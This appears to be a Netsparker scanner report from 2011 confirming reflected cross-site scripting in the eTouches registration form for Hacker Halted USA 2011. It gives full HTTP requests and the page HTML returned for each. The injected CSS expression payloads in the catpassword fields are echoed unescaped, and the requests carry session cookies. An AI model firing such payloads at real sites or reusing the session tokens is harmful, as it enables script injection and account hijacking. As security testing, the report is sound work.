Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3412
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="33%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="preload_category" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="-1" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><input type="hidden" name="discountcode" value="3" /><!--Array( [cat] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><table cellspacing="0" cellpadding="2" class="standard"><tr><td colspan="2" class="red"><br /><b>Please select from the following options:</b><font class="red">*</font><br /><br /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65410" name="selectcategoryid" alt="category" value="65410" onclick="altercost(0.00);closeallpass();" /></td><td><label for="c65410">Training Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65409" name="selectcategoryid" alt="category" value="65409" onclick="altercost(1299.00);closeallpass();" /></td><td><label for="c65409">Conference Pass Only</label> $1,299.00 </td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65415" name="selectcategoryid" alt="category" value="65415" onclick="altercost(899.00);closeallpass();" /></td><td><label for="c65415">Conference Pass (ECC Member ONLY)</label> $899.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65415&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65419" name="selectcategoryid" alt="category" value="65419" onclick="altercost(399.00);closeallpass();document.getElementById('pass65419').style.display='';" /></td><td><label for="c65419">Academic (Limited to 100)</label> $399.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65419&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65419" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65419]" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65420" name="selectcategoryid" alt="category" value="65420" onclick="altercost(0.00);closeallpass();document.getElementById('pass65420').style.display='';" /></td><td><label for="c65420">Exhibition Only Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65420&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65420" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65420]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65413" name="selectcategoryid" alt="category" value="65413" onclick="altercost(0.00);closeallpass();document.getElementById('pass65413').style.display='';" /></td><td><label for="c65413">Press/ Media Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65413&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65413" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65413]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65411" name="selectcategoryid" alt="category" value="65411" onclick="altercost(0.00);closeallpass();document.getElementById('pass65411').style.display='';" /></td><td><label for="c65411">Presenter / Trainer</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65411&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65411" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65411]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65421" name="selectcategoryid" alt="category" value="65421" onclick="altercost(0.00);closeallpass();document.getElementById('pass65421').style.display='';" /></td><td><label for="c65421">Sponsors/ Exhibitors Pass</label> </td></tr><tr id="pass65421" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65421]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65407" name="selectcategoryid" alt="category" value="65407" onclick="altercost(0.00);closeallpass();document.getElementById('pass65407').style.display='';" /></td><td><label for="c65407">Crew</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65407&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65407" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65407]" value="
-----------------------------7db2107a156e--" size="60" autocomplete="off" /></td></tr></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {document.getElementById('pass65419').style.display='none';document.getElementById('pass65420').style.display='none';document.getElementById('pass65413').style.display='none';document.getElementById('pass65411').style.display='none';document.getElementById('pass65421').style.display='none';document.getElementById('pass65407').style.display='none';}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST preload_category
eventid POST 19301
categoryid POST -1
language POST eng
reference POST 3
eb POST 3
admin POST -1
bridgeid POST 3
discountcode POST 3
catpassword[65419] POST 3
catpassword[65420] POST " stYle="x:expre/**/ssion(alert(9))
catpassword[65413] POST 3
catpassword[65411] POST 3
catpassword[65421] POST 3
catpassword[65407] POST -----------------------------7db2107a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=2620d2d341e647f98eb89a9ccffc8419
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=k9q8e3gp8otpns43k6nas1c6b3
Content-Length: 1550
Accept-Encoding: gzip, deflate

--2620d2d341e647f98eb89a9ccffc8419
Content-Disposition: form-data; name="action"

preload_category
--2620d2d341e647f98eb89a9ccffc8419
Content-Disposition: form-data; name="eventid"

19301
--2620d2d341e647f98eb89a9ccffc8419
Content-Disposition: form-data; name="categoryid"

-1
--2620d2d341e647f98eb89a9ccffc8419
Content-Disposition: form-data; name="language"

eng
--2620d2d341e647f98eb89a9ccffc8419
Content-Disposition: form-data; name="reference"

3
--2620d2d341e647f98eb89a9ccffc8419
Content-Disposition: form-data; name="eb"

3
--2620d2d341e647f98eb89a9ccffc8419
Content-Disposition: form-data; name="admin"

-1
--2620d2d341e647f98eb89a9ccffc8419
Content-Disposition: form-data; name="bridgeid"

3
--2620d2d341e647f98eb89a9ccffc8419
Content-Disposition: form-data; name="discountcode"

3
--2620d2d341e647f98eb89a9ccffc8419
Content-Disposition: form-data; name="catpassword[65419]"

3
--2620d2d341e647f98eb89a9ccffc8419
Content-Disposition: form-data; name="catpassword[65420]"

" stYle="x:expre/**/ssion(netsparker(9))
--2620d2d341e647f98eb89a9ccffc8419
Content-Disposition: form-data; name="catpassword[65413]"

3
--2620d2d341e647f98eb89a9ccffc8419
Content-Disposition: form-data; name="catpassword[65411]"

3
--2620d2d341e647f98eb89a9ccffc8419
Content-Disposition: form-data; name="catpassword[65421]"

3
--2620d2d341e647f98eb89a9ccffc8419
Content-Disposition: form-data; name="catpassword[65407]"


-----------------------------7db2107a156e--
--2620d2d341e647f98eb89a9ccffc8419--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 15:52:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3412
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="33%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="preload_category" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="-1" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><input type="hidden" name="discountcode" value="3" /><!--Array( [cat] => 1)--><p class="red"><b>There are problems with the fields in red.</b></p><table cellspacing="0" cellpadding="2" class="standard"><tr><td colspan="2" class="red"><br /><b>Please select from the following options:</b><font class="red">*</font><br /><br /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65410" name="selectcategoryid" alt="category" value="65410" onclick="altercost(0.00);closeallpass();" /></td><td><label for="c65410">Training Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65409" name="selectcategoryid" alt="category" value="65409" onclick="altercost(1299.00);closeallpass();" /></td><td><label for="c65409">Conference Pass Only</label> $1,299.00 </td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65415" name="selectcategoryid" alt="category" value="65415" onclick="altercost(899.00);closeallpass();" /></td><td><label for="c65415">Conference Pass (ECC Member ONLY)</label> $899.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65415&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65419" name="selectcategoryid" alt="category" value="65419" onclick="altercost(399.00);closeallpass();document.getElementById('pass65419').style.display='';" /></td><td><label for="c65419">Academic (Limited to 100)</label> $399.00 <a href="javascript:openwindow('popups/catdetails.php?cat=65419&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65419" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65419]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65420" name="selectcategoryid" alt="category" value="65420" onclick="altercost(0.00);closeallpass();document.getElementById('pass65420').style.display='';" /></td><td><label for="c65420">Exhibition Only Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65420&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65420" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65420]" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65413" name="selectcategoryid" alt="category" value="65413" onclick="altercost(0.00);closeallpass();document.getElementById('pass65413').style.display='';" /></td><td><label for="c65413">Press/ Media Pass</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65413&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65413" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65413]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65411" name="selectcategoryid" alt="category" value="65411" onclick="altercost(0.00);closeallpass();document.getElementById('pass65411').style.display='';" /></td><td><label for="c65411">Presenter / Trainer</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65411&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65411" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65411]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65421" name="selectcategoryid" alt="category" value="65421" onclick="altercost(0.00);closeallpass();document.getElementById('pass65421').style.display='';" /></td><td><label for="c65421">Sponsors/ Exhibitors Pass</label> </td></tr><tr id="pass65421" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65421]" value="3" size="60" autocomplete="off" /></td></tr><tr><td width="175" align="right" valign="top"><input type="radio" id="c65407" name="selectcategoryid" alt="category" value="65407" onclick="altercost(0.00);closeallpass();document.getElementById('pass65407').style.display='';" /></td><td><label for="c65407">Crew</label> <a href="javascript:openwindow('popups/catdetails.php?cat=65407&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><tr id="pass65407" style="display:none;"><td width="175" align="right" >Password<font class="red">*</font></td><td><input type="password" name="catpassword[65407]" value="
-----------------------------7db2107a156e--" size="60" autocomplete="off" /></td></tr></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {document.getElementById('pass65419').style.display='none';document.getElementById('pass65420').style.display='none';document.getElementById('pass65413').style.display='none';document.getElementById('pass65411').style.display='none';document.getElementById('pass65421').style.display='none';document.getElementById('pass65407').style.display='none';}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST preload_category
eventid POST 19301
categoryid POST -1
language POST eng
reference POST 3
eb POST 3
admin POST -1
bridgeid POST 3
discountcode POST 3
catpassword[65419] POST 3
catpassword[65420] POST 3
catpassword[65413] POST " stYle="x:expre/**/ssion(alert(9))
catpassword[65411] POST 3
catpassword[65421] POST 3
catpassword[65407] POST -----------------------------7db2107a156e--

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=7bf05241fcd84e3e94bfbfb2e4c2c9d0
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=k9q8e3gp8otpns43k6nas1c6b3
Content-Length: 1550
Accept-Encoding: gzip, deflate

--7bf05241fcd84e3e94bfbfb2e4c2c9d0
Content-Disposition: form-data; name="action"

preload_category
--7bf05241fcd84e3e94bfbfb2e4c2c9d0
Content-Disposition: form-data; name="eventid"

19301
--7bf05241fcd84e3e94bfbfb2e4c2c9d0
Content-Disposition: form-data; name="categoryid"

-1
--7bf05241fcd84e3e94bfbfb2e4c2c9d0
Content-Disposition: form-data; name="language"

eng
--7bf05241fcd84e3e94bfbfb2e4c2c9d0
Content-Disposition: form-data; name="reference"

3
--7bf05241fcd84e3e94bfbfb2e4c2c9d0
Content-Disposition: form-data; name="eb"

3
--7bf05241fcd84e3e94bfbfb2e4c2c9d0
Content-Disposition: form-data; name="admin"

-1
--7bf05241fcd84e3e94bfbfb2e4c2c9d0
Content-Disposition: form-data; name="bridgeid"

3
--7bf05241fcd84e3e94bfbfb2e4c2c9d0
Content-Disposition: form-data; name="discountcode"

3
--7bf05241fcd84e3e94bfbfb2e4c2c9d0
Content-Disposition: form-data; name="catpassword[65419]"

3
--7bf05241fcd84e3e94bfbfb2e4c2c9d0
Content-Disposition: form-data; name="catpassword[65420]"

3
--7bf05241fcd84e3e94bfbfb2e4c2c9d0
Content-Disposition: form-data; name="catpassword[65413]"

" stYle="x:expre/**/ssion(netsparker(9))
--7bf05241fcd84e3e94bfbfb2e4c2c9d0
Content-Disposition: form-data; name="catpassword[65411]"

3
--7bf05241fcd84e3e94bfbfb2e4c2c9d0
Content-Disposition: form-data; name="catpassword[65421]"

3
--7bf05241fcd84e3e94bfbfb2e4c2c9d0
Content-Disposition: form-data; name="catpassword[65407]"


-----------------------------7db2107a156e--
--7bf05241fcd84e3e94bfbfb2e4c2c9d0--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 15:52:50 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3411
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; 